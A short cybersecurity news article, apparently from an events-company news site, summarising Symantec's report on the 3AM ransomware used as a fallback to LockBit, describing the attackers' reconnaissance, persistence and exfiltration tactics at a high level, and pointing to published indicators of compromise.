Gruppo ECP Advpress Automationtoday AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit Gruppo ECP Advpress Automationtoday AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

LockBit: attackers use alternative ransomware as a fallback

The emerging threat: 3AM ransomware spreads as an alternative option to security locks

Attackers use 3AM ransomware as an alternative to LockBit, trying to bypass security measures. Ransomware encrypts files and deletes backup copies, making recovery difficult. Symantec provides indicators to detect and protect against.
Gruppo ECP

WE TURN YOUR GOALS INTO REALITY
Your competitive advantage starts here
DISCOVER HOW

Gruppo ECP

WE TURN YOUR GOALS INTO REALITY
Your competitive advantage
starts here
DISCOVER HOW

This pill is also available in Italian language

According to threat researchers at Symantec, attackers are using the 3AM ransomware as a fallback option in case LockBit is detected and blocked. Even though security solutions might prevent a LockBit infection, you may still end up with encrypted files. The 3AM ransomware, named for the .threeamtime extension added to encrypted files, is a new variant written in Rust that attempts to terminate security and backup software on the infected computer. Although it has only been used in a limited attack, this ransomware may circulate again in the future.

3AM's modus operandi

According to researchers' analysis, 3AM tries to erase Shadow Volume copies after encrypting the target files and deleting the original ones. However, it doesn't seem effective or stealthy enough to go unnoticed. The attackers attempted to deploy it on three machines on a corporate network, but only one of them managed to escape the security locks. Before encrypting the files, the attackers also exfiltrated the data, leaving open the possibility of further extorting the victim organization.

Attack methods used by attackers

It was not specified how the first system was compromised. However, Symantec researchers have spotted some suspicious hacker activity. These include using the "gpresult" command to dump the policy settings applied to the computer for a specified user. The attackers also ran components of Cobalt Strike and attempted to escalate privileges using “PsExec.” Next, they ran reconnaissance operations with commands like “whoami,” “netstat,” “quser,” and “net share,” and enumerated other servers they could access via “quser” and “net view.” Finally, they added a new user to ensure persistence and sent the victims' files to their FTP server via the "Wput" tool.

Indicators of compromise provided by Symantec

Symantec provided some indicators of compromise, including IP addresses and file hashes for the two malware variants and the Cobalt Strike recalls. It's important to keep track of these clues so you can implement the necessary security measures to detect and mitigate potential attacks.

Follow us on Threads for more pills like this

09/14/2023 11:09

Marco Verro

Last pills

Cloudflare repels the most powerful DDoS attack ever recordedAdvanced defense and global collaboration to tackle new challenges of DDoS attacks

Silent threats: the zero-click flaw that compromises RDP serversHidden risks in remote work: how to protect RDP servers from invisible attacks

Discovery of vulnerability in Secure Boot threatens device securityFlaw in the Secure Boot system requires urgent updates to prevent invisible intrusions

North korean cyberattacks and laptop farming: threats to smart workingAdapting to new digital threats of remote work to protect vital data and infrastructures

Don’t miss the most important news
Enable notifications to stay always updated